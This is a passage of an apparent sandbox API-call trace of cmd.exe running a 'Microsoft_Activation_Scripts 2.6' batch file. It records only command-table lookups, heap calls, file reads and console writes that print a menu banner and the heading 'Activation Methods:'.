(_String1="echo:", _String2="CHDIR") returned 2 [0180.777] _wcsicmp (_String1="echo:", _String2="RENAME") returned -13 [0180.777] _wcsicmp (_String1="echo:", _String2="REN") returned -13 [0180.778] _wcsicmp (_String1="echo:", _String2="ECHO") returned 58 [0180.778] _wcsicmp (_String1="echo:", _String2="SET") returned -14 [0180.778] _wcsicmp (_String1="echo:", _String2="PAUSE") returned -11 [0180.778] _wcsicmp (_String1="echo:", _String2="DATE") returned 1 [0180.778] _wcsicmp (_String1="echo:", _String2="TIME") returned -15 [0180.778] _wcsicmp (_String1="echo:", _String2="PROMPT") returned -11 [0180.778] _wcsicmp (_String1="echo:", _String2="MD") returned -8 [0180.778] _wcsicmp (_String1="echo:", _String2="MKDIR") returned -8 [0180.778] _wcsicmp (_String1="echo:", _String2="RD") returned -13 [0180.778] _wcsicmp (_String1="echo:", _String2="RMDIR") returned -13 [0180.778] _wcsicmp (_String1="echo:", _String2="PATH") returned -11 [0180.778] _wcsicmp (_String1="echo:", _String2="GOTO") returned -2 [0180.778] _wcsicmp (_String1="echo:", _String2="SHIFT") returned -14 [0180.778] _wcsicmp (_String1="echo:", _String2="CLS") returned 2 [0180.778] _wcsicmp (_String1="echo:", _String2="CALL") returned 2 [0180.778] _wcsicmp (_String1="echo:", _String2="VERIFY") returned -17 [0180.779] _wcsicmp (_String1="echo:", _String2="VER") returned -17 [0180.779] _wcsicmp (_String1="echo:", _String2="VOL") returned -17 [0180.779] _wcsicmp (_String1="echo:", _String2="EXIT") returned -21 [0180.779] _wcsicmp (_String1="echo:", _String2="SETLOCAL") returned -14 [0180.779] _wcsicmp (_String1="echo:", _String2="ENDLOCAL") returned -11 [0180.779] _wcsicmp (_String1="echo:", _String2="TITLE") returned -15 [0180.779] _wcsicmp (_String1="echo:", _String2="START") returned -14 [0180.779] _wcsicmp (_String1="echo:", _String2="DPATH") returned 1 [0180.779] _wcsicmp (_String1="echo:", _String2="KEYS") returned -6 [0180.779] _wcsicmp (_String1="echo:", _String2="MOVE") returned -8 [0180.779] _wcsicmp (_String1="echo:", _String2="PUSHD") returned -11 [0180.779] _wcsicmp (_String1="echo:", _String2="POPD") returned -11 [0180.779] _wcsicmp (_String1="echo:", _String2="ASSOC") returned 4 [0180.779] _wcsicmp (_String1="echo:", _String2="FTYPE") returned -1 [0180.779] _wcsicmp (_String1="echo:", _String2="BREAK") returned 3 [0180.779] _wcsicmp (_String1="echo:", _String2="COLOR") returned 2 [0180.779] _wcsicmp (_String1="echo:", _String2="MKLINK") returned -8 [0180.780] _wcsnicmp (_String1="echo", _String2="cmd ", _MaxCount=0x4) returned 2 [0180.780] GetFileAttributesW (lpFileName="\n" (normalized: "c:\\windows\\system32\\\n")) returned 0xffffffff [0180.780] GetLastError () returned 0x7b [0180.780] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efec50, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0180.781] GetFileAttributesW (lpFileName="echo:" (normalized: "c:\\windows\\system32\\echo:")) returned 0xffffffff [0180.781] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0180.781] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0180.781] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0180.781] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0180.781] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0180.781] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0180.781] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0180.781] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0180.781] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0180.781] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0180.781] GetProcessHeap () returned 0x19a8f1e0000 [0180.781] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xa6) returned 0x19a8f200660 [0180.782] GetProcessHeap () returned 0x19a8f1e0000 [0180.782] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x12c) returned 0x19a8f1ea8b0 [0180.782] GetProcessHeap () returned 0x19a8f1e0000 [0180.782] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1ea8b0, Size=0x94) returned 0x19a8f1ea8b0 [0180.782] GetProcessHeap () returned 0x19a8f1e0000 [0180.782] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1ea8b0) returned 0x94 [0180.782] GetProcessHeap () returned 0x19a8f1e0000 [0180.782] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xa8) returned 0x19a8f200c90 [0180.782] _vsnwprintf (in: _Buffer=0x7ff7bd731b60, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x43f9efe9e8 | out: _Buffer=" ______________________________________________________________\r\n") returned 71 [0180.782] _get_osfhandle (_FileHandle=1) returned 0x24 [0180.782] GetFileType (hFile=0x24) returned 0x2 [0180.782] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0180.782] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x43f9efe968 | out: lpMode=0x43f9efe968) returned 1 [0180.783] _get_osfhandle (_FileHandle=1) returned 0x24 [0180.783] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0x7ff7bd731b60*, nNumberOfCharsToWrite=0x47, lpNumberOfCharsWritten=0x43f9efe9a8, lpReserved=0x0 | out: lpBuffer=0x7ff7bd731b60*, lpNumberOfCharsWritten=0x43f9efe9a8*=0x47) returned 1 [0180.789] _get_osfhandle (_FileHandle=1) returned 0x24 [0180.789] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0180.790] _get_osfhandle (_FileHandle=1) returned 0x24 [0180.790] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0180.790] _get_osfhandle (_FileHandle=0) returned 0x20 [0180.790] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0180.790] SetConsoleInputExeNameW () returned 0x1 [0180.790] GetConsoleOutputCP () returned 0x1b5 [0180.790] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0180.790] SetThreadUILanguage (LangId=0x0) returned 0x409 [0180.791] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0180.791] _open_osfhandle (_OSFileHandle=0xa0, _Flags=8) returned 3 [0180.791] _get_osfhandle (_FileHandle=3) returned 0xa0 [0180.791] SetFilePointer (in: hFile=0xa0, lDistanceToMove=9310, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x245e [0180.791] GetProcessHeap () returned 0x19a8f1e0000 [0180.792] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f200c90) returned 1 [0180.792] GetProcessHeap () returned 0x19a8f1e0000 [0180.793] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ea8b0) returned 1 [0180.793] GetProcessHeap () returned 0x19a8f1e0000 [0180.793] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f200660) returned 1 [0180.794] GetProcessHeap () returned 0x19a8f1e0000 [0180.794] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f200710) returned 1 [0180.794] GetProcessHeap () returned 0x19a8f1e0000 [0180.794] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb8f0) returned 1 [0180.794] GetProcessHeap () returned 0x19a8f1e0000 [0180.795] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edf50) returned 1 [0180.795] _get_osfhandle (_FileHandle=3) returned 0xa0 [0180.795] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x245e [0180.795] ReadFile (in: hFile=0xa0, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0180.795] SetFilePointer (in: hFile=0xa0, lDistanceToMove=9317, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2465 [0180.795] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo:\r\n", cbMultiByte=7, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="echo:\r\n ______________________________________________________________\r\n==============================================================\r\n_=%%a\"\r\n_desktop_=%%b\"\r\n") returned 7 [0180.796] _get_osfhandle (_FileHandle=3) returned 0xa0 [0180.796] GetFileType (hFile=0xa0) returned 0x1 [0180.796] _get_osfhandle (_FileHandle=3) returned 0xa0 [0180.796] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2465 [0180.796] GetProcessHeap () returned 0x19a8f1e0000 [0180.796] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f20d9b0 [0180.796] GetProcessHeap () returned 0x19a8f1e0000 [0180.797] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0180.798] _wcsicmp (_String1="echo:", _String2=")") returned 60 [0180.798] _wcsicmp (_String1="FOR", _String2="echo:") returned 1 [0180.798] _wcsicmp (_String1="FOR/?", _String2="echo:") returned 1 [0180.798] _wcsicmp (_String1="IF", _String2="echo:") returned 4 [0180.798] _wcsicmp (_String1="IF/?", _String2="echo:") returned 4 [0180.798] _wcsicmp (_String1="REM", _String2="echo:") returned 13 [0180.798] _wcsicmp (_String1="REM/?", _String2="echo:") returned 13 [0180.798] GetProcessHeap () returned 0x19a8f1e0000 [0180.798] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee6d0 [0180.798] GetProcessHeap () returned 0x19a8f1e0000 [0180.798] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb8f0 [0180.798] _tell (_FileHandle=3) returned 9317 [0180.798] _close (_FileHandle=3) returned 0 [0180.798] _wcsicmp (_String1="echo:", _String2="DIR") returned 1 [0180.798] _wcsicmp (_String1="echo:", _String2="ERASE") returned -15 [0180.798] _wcsicmp (_String1="echo:", _String2="DEL") returned 1 [0180.798] _wcsicmp (_String1="echo:", _String2="TYPE") returned -15 [0180.798] _wcsicmp (_String1="echo:", _String2="COPY") returned 2 [0180.798] _wcsicmp (_String1="echo:", _String2="CD") returned 2 [0180.799] _wcsicmp (_String1="echo:", _String2="CHDIR") returned 2 [0180.799] _wcsicmp (_String1="echo:", _String2="RENAME") returned -13 [0180.799] _wcsicmp (_String1="echo:", _String2="REN") returned -13 [0180.799] _wcsicmp (_String1="echo:", _String2="ECHO") returned 58 [0180.799] _wcsicmp (_String1="echo:", _String2="SET") returned -14 [0180.799] _wcsicmp (_String1="echo:", _String2="PAUSE") returned -11 [0180.799] _wcsicmp (_String1="echo:", _String2="DATE") returned 1 [0180.799] _wcsicmp (_String1="echo:", _String2="TIME") returned -15 [0180.799] _wcsicmp (_String1="echo:", _String2="PROMPT") returned -11 [0180.799] _wcsicmp (_String1="echo:", _String2="MD") returned -8 [0180.799] _wcsicmp (_String1="echo:", _String2="MKDIR") returned -8 [0180.799] _wcsicmp (_String1="echo:", _String2="RD") returned -13 [0180.799] _wcsicmp (_String1="echo:", _String2="RMDIR") returned -13 [0180.799] _wcsicmp (_String1="echo:", _String2="PATH") returned -11 [0180.799] _wcsicmp (_String1="echo:", _String2="GOTO") returned -2 [0180.799] _wcsicmp (_String1="echo:", _String2="SHIFT") returned -14 [0180.799] _wcsicmp (_String1="echo:", _String2="CLS") returned 2 [0180.799] _wcsicmp (_String1="echo:", _String2="CALL") returned 2 [0180.799] _wcsicmp (_String1="echo:", _String2="VERIFY") returned -17 [0180.799] _wcsicmp (_String1="echo:", _String2="VER") returned -17 [0180.799] _wcsicmp (_String1="echo:", _String2="VOL") returned -17 [0180.799] _wcsicmp (_String1="echo:", _String2="EXIT") returned -21 [0180.799] _wcsicmp (_String1="echo:", _String2="SETLOCAL") returned -14 [0180.799] _wcsicmp (_String1="echo:", _String2="ENDLOCAL") returned -11 [0180.813] _wcsicmp (_String1="echo:", _String2="TITLE") returned -15 [0180.813] _wcsicmp (_String1="echo:", _String2="START") returned -14 [0180.813] _wcsicmp (_String1="echo:", _String2="DPATH") returned 1 [0180.813] _wcsicmp (_String1="echo:", _String2="KEYS") returned -6 [0180.813] _wcsicmp (_String1="echo:", _String2="MOVE") returned -8 [0180.813] _wcsicmp (_String1="echo:", _String2="PUSHD") returned -11 [0180.813] _wcsicmp (_String1="echo:", _String2="POPD") returned -11 [0180.813] _wcsicmp (_String1="echo:", _String2="ASSOC") returned 4 [0180.813] _wcsicmp (_String1="echo:", _String2="FTYPE") returned -1 [0180.813] _wcsicmp (_String1="echo:", _String2="BREAK") returned 3 [0180.813] _wcsicmp (_String1="echo:", _String2="COLOR") returned 2 [0180.813] _wcsicmp (_String1="echo:", _String2="MKLINK") returned -8 [0180.813] _wcsnicmp (_String1="echo", _String2="cmd ", _MaxCount=0x4) returned 2 [0180.814] GetFileAttributesW (lpFileName="\n" (normalized: "c:\\windows\\system32\\\n")) returned 0xffffffff [0180.814] GetLastError () returned 0x7b [0180.814] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efec50, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0180.814] GetFileAttributesW (lpFileName="echo:" (normalized: "c:\\windows\\system32\\echo:")) returned 0xffffffff [0180.815] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0180.815] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0180.815] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0180.815] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0180.815] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0180.815] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0180.815] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0180.815] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0180.815] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0180.815] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0180.815] GetProcessHeap () returned 0x19a8f1e0000 [0180.815] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb950 [0180.816] GetProcessHeap () returned 0x19a8f1e0000 [0180.816] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ecc60 [0180.816] GetProcessHeap () returned 0x19a8f1e0000 [0180.816] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1ecc60, Size=0x16) returned 0x19a8f1ec880 [0180.816] GetProcessHeap () returned 0x19a8f1e0000 [0180.816] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1ec880) returned 0x16 [0180.816] GetProcessHeap () returned 0x19a8f1e0000 [0180.817] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1e) returned 0x19a8f1eb740 [0180.817] _vsnwprintf (in: _Buffer=0x7ff7bd731b60, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x43f9efe9e8 | out: _Buffer="\r\n") returned 2 [0180.817] _get_osfhandle (_FileHandle=1) returned 0x24 [0180.817] GetFileType (hFile=0x24) returned 0x2 [0180.817] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0180.817] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x43f9efe968 | out: lpMode=0x43f9efe968) returned 1 [0180.817] _get_osfhandle (_FileHandle=1) returned 0x24 [0180.817] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0x7ff7bd731b60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x43f9efe9a8, lpReserved=0x0 | out: lpBuffer=0x7ff7bd731b60*, lpNumberOfCharsWritten=0x43f9efe9a8*=0x2) returned 1 [0180.818] _get_osfhandle (_FileHandle=1) returned 0x24 [0180.818] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0180.818] _get_osfhandle (_FileHandle=1) returned 0x24 [0180.818] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0180.819] _get_osfhandle (_FileHandle=0) returned 0x20 [0180.819] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0180.819] SetConsoleInputExeNameW () returned 0x1 [0180.819] GetConsoleOutputCP () returned 0x1b5 [0180.820] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0180.820] SetThreadUILanguage (LangId=0x0) returned 0x409 [0180.820] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0180.820] _open_osfhandle (_OSFileHandle=0xa0, _Flags=8) returned 3 [0180.820] _get_osfhandle (_FileHandle=3) returned 0xa0 [0180.820] SetFilePointer (in: hFile=0xa0, lDistanceToMove=9317, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2465 [0180.820] GetProcessHeap () returned 0x19a8f1e0000 [0180.820] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb740) returned 1 [0180.820] GetProcessHeap () returned 0x19a8f1e0000 [0180.820] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec880) returned 1 [0180.821] GetProcessHeap () returned 0x19a8f1e0000 [0180.821] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb950) returned 1 [0180.821] GetProcessHeap () returned 0x19a8f1e0000 [0180.821] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb8f0) returned 1 [0180.821] GetProcessHeap () returned 0x19a8f1e0000 [0180.822] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee6d0) returned 1 [0180.822] _get_osfhandle (_FileHandle=3) returned 0xa0 [0180.822] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2465 [0180.822] ReadFile (in: hFile=0xa0, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0180.822] SetFilePointer (in: hFile=0xa0, lDistanceToMove=9360, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2490 [0180.822] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo: Activation Methods:\r\n", cbMultiByte=43, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="echo: Activation Methods:\r\n_______________________________\r\n==============================================================\r\n_=%%a\"\r\n_desktop_=%%b\"\r\n") returned 43 [0180.822] _get_osfhandle (_FileHandle=3) returned 0xa0 [0180.822] GetFileType (hFile=0xa0) returned 0x1 [0180.822] _get_osfhandle (_FileHandle=3) returned 0xa0 [0180.822] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2490 [0180.822] GetProcessHeap () returned 0x19a8f1e0000 [0180.822] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f20d9b0 [0180.823] GetProcessHeap () returned 0x19a8f1e0000 [0180.824] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0180.825] _wcsicmp (_String1="echo:", _String2=")") returned 60 [0180.825] _wcsicmp (_String1="FOR", _String2="echo:") returned 1 [0180.825] _wcsicmp (_String1="FOR/?", _String2="echo:") returned 1 [0180.825] _wcsicmp (_String1="IF", _String2="echo:") returned 4 [0180.825] _wcsicmp (_String1="IF/?", _String2="echo:") returned 4 [0180.825] _wcsicmp (_String1="REM", _String2="echo:") returned 13 [0180.825] _wcsicmp (_String1="REM/?", _String2="echo:") returned 13 [0180.825] GetProcessHeap () returned 0x19a8f1e0000 [0180.825] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edd10 [0180.825] GetProcessHeap () returned 0x19a8f1e0000 [0180.825] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb6e0 [0180.825] GetProcessHeap () returned 0x19a8f1e0000 [0180.825] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x5a) returned 0x19a8f1eaed0 [0180.825] _tell (_FileHandle=3) returned 9360 [0180.825] _close (_FileHandle=3) returned 0 [0180.826] _wcsicmp (_String1="echo:", _String2="DIR") returned 1 [0180.826] _wcsicmp (_String1="echo:", _String2="ERASE") returned -15 [0180.826] _wcsicmp (_String1="echo:", _String2="DEL") returned 1 [0180.826] _wcsicmp (_String1="echo:", _String2="TYPE") returned -15 [0180.826] _wcsicmp (_String1="echo:", _String2="COPY") returned 2 [0180.826] _wcsicmp (_String1="echo:", _String2="CD") returned 2 [0180.826] _wcsicmp (_String1="echo:", _String2="CHDIR") returned 2 [0180.826] _wcsicmp (_String1="echo:", _String2="RENAME") returned -13 [0180.826] _wcsicmp (_String1="echo:", _String2="REN") returned -13 [0180.826] _wcsicmp (_String1="echo:", _String2="ECHO") returned 58 [0180.826] _wcsicmp (_String1="echo:", _String2="SET") returned -14 [0180.826] _wcsicmp (_String1="echo:", _String2="PAUSE") returned -11 [0180.826] _wcsicmp (_String1="echo:", _String2="DATE") returned 1 [0180.826] _wcsicmp (_String1="echo:", _String2="TIME") returned -15 [0180.826] _wcsicmp (_String1="echo:", _String2="PROMPT") returned -11 [0180.826] _wcsicmp (_String1="echo:", _String2="MD") returned -8 [0180.826] _wcsicmp (_String1="echo:", _String2="MKDIR") returned -8 [0180.826] _wcsicmp (_String1="echo:", _String2="RD") returned -13 [0180.826] _wcsicmp (_String1="echo:", _String2="RMDIR") returned -13 [0180.826] _wcsicmp (_String1="echo:", _String2="PATH") returned -11 [0180.826] _wcsicmp (_String1="echo:", _String2="GOTO") returned -2 [0180.826] _wcsicmp (_String1="echo:", _String2="SHIFT") returned -14 [0180.827] _wcsicmp (_String1="echo:", _String2="CLS") returned 2 [0180.827] _wcsicmp (_String1="echo:", _String2="CALL") returned 2 [0180.827] _wcsicmp (_String1="echo:", _String2="VERIFY") returned -17 [0180.827] _wcsicmp (_String1="echo:", _String2="VER") returned -17 [0180.827] _wcsicmp (_String1="echo:", _String2="VOL") returned -17 [0180.827] _wcsicmp (_String1="echo:", _String2="EXIT") returned -21 [0180.827] _wcsicmp (_String1="echo:", _String2="SETLOCAL") returned -14 [0180.827] _wcsicmp (_String1="echo:", _String2="ENDLOCAL") returned -11 [0180.827] _wcsicmp (_String1="echo:", _String2="TITLE") returned -15 [0180.827] _wcsicmp (_String1="echo:", _String2="START") returned -14 [0180.827] _wcsicmp (_String1="echo:", _String2="DPATH") returned 1 [0180.827] _wcsicmp (_String1="echo:", _String2="KEYS") returned -6 [0180.827] _wcsicmp (_String1="echo:", _String2="MOVE") returned -8 [0180.827] _wcsicmp (_String1="echo:", _String2="PUSHD") returned -11 [0180.827] _wcsicmp (_String1="echo:", _String2="POPD") returned -11 [0180.827] _wcsicmp (_String1="echo:", _String2="ASSOC") returned 4 [0180.827] _wcsicmp (_String1="echo:", _String2="FTYPE") returned -1 [0180.827] _wcsicmp (_String1="echo:", _String2="BREAK") returned 3 [0180.827] _wcsicmp (_String1="echo:", _String2="COLOR") returned 2 [0180.827] _wcsicmp (_String1="echo:", _String2="MKLINK") returned -8 [0180.827] _wcsnicmp (_String1="echo", _String2="cmd ", _MaxCount=0x4) returned 2 [0180.828] GetFileAttributesW (lpFileName="\n" (normalized: "c:\\windows\\system32\\\n")) returned 0xffffffff [0180.828] GetLastError () returned 0x7b [0180.828] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efec50, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0180.828] GetFileAttributesW (lpFileName="echo:" (normalized: "c:\\windows\\system32\\echo:")) returned 0xffffffff [0180.828] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0180.829] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0180.829] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0180.829] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0180.829] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0180.829] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0180.829] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0180.829] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0180.829] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0180.829] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0180.829] GetProcessHeap () returned 0x19a8f1e0000 [0180.829] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x64) returned 0x19a8f1eaf40 [0180.829] GetProcessHeap () returned 0x19a8f1e0000 [0180.829] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xa8) returned 0x19a8f2002f0 [0180.829] GetProcessHeap () returned 0x19a8f1e0000 [0180.829] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f2002f0, Size=0x3e) returned 0x19a8f1f95e0 [0180.829] GetProcessHeap () returned 0x19a8f1e0000 [0180.829] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1f95e0) returned 0x3e [0180.829] GetProcessHeap () returned 0x19a8f1e0000 [0180.829] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x66) returned 0x19a8f1ea8b0 [0180.829] _vsnwprintf (in: _Buffer=0x7ff7bd731b60, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x43f9efe9e8 | out: _Buffer=" Activation Methods:\r\n") returned 38 [0180.829] _get_osfhandle (_FileHandle=1) returned 0x24 [0180.829] GetFileType (hFile=0x24) returned 0x2 [0180.830] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0180.830] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x43f9efe968 | out: lpMode=0x43f9efe968) returned 1 [0180.830] _get_osfhandle (_FileHandle=1) returned 0x24 [0180.830] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0x7ff7bd731b60*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x43f9efe9a8, lpReserved=0x0 | out: lpBuffer=0x7ff7bd731b60*, lpNumberOfCharsWritten=0x43f9efe9a8*=0x26) returned 1 [0180.833] _get_osfhandle (_FileHandle=1) returned 0x24 [0180.833] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0180.834] _get_osfhandle (_FileHandle=1) returned 0x24 [0180.834] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0180.834] _get_osfhandle (_FileHandle=0) returned 0x20 [0180.834] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0180.834] SetConsoleInputExeNameW () returned 0x1 [0180.834] GetConsoleOutputCP () returned 0x1b5 [0180.835] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0180.835] SetThreadUILanguage (LangId=0x0) returned 0x409 [0180.835] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: 